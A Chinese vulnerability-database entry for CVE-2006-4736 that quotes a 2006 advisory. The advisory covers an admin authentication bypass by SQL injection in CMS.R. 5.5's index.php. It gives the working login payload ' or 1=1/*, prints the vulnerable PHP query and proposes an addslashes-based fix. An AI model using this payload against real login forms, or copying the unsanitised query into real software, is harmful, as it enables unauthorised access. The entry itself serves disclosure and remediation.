CMS.R. 'Index.PHP' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193538 漏洞类型 SQL注入
发布时间 2006-09-13 更新时间 2006-09-25
CVE编号 CVE-2006-4736 CNNVD-ID CNNVD-200609-194
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006090091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-194
|漏洞详情
CMS.R.5.5的index.php中存在多个SQL注入漏洞,远程攻击者可以通过(1)adminname和(2)adminpass参数执行任意SQL命令。
|漏洞EXP
Hello

Title : CMS.R. the Content Management System admin authentication baypass

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

The Vulnerability works 100% with magic_quotes_gpc = off

put the user name value (' or 1=1/*)

[code]

' or 1=1/*

[/code]

and you will login :)

error file : index.php

line : 48

query :-

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

solution:-

replace

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

with

[code]

//

//	Fixed By : HACKERS PAL

//                        WwW.SoQoR.NeT

//

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".addslashes($_POST['adminname'])."' AND BINARY pass='".addslashes($_POST['adminpass'])."'";

[/code]

WwW.SoQoR.NeT
|参考资料

来源:XF
名称:cmsr-index-sql-injection(28877)
链接:http://xforce.iss.net/xforce/xfdb/28877
来源:BID
名称:19950
链接:http://www.securityfocus.com/bid/19950
来源:BUGTRAQ
名称:20060911CMS.R.theContentManagementSystemadminauthenticationbaypass
链接:http://www.securityfocus.com/archive/1/archive/1/445789/100/0/threaded
来源:VUPEN
名称:ADV-2006-3561
链接:http://www.frsirt.com/english/advisories/2006/3561
来源:SECUNIA
名称:21860
链接:http://secunia.com/advisories/21860
来源:SREASON
名称:1563
链接:http://securityreason.com/securityalert/1563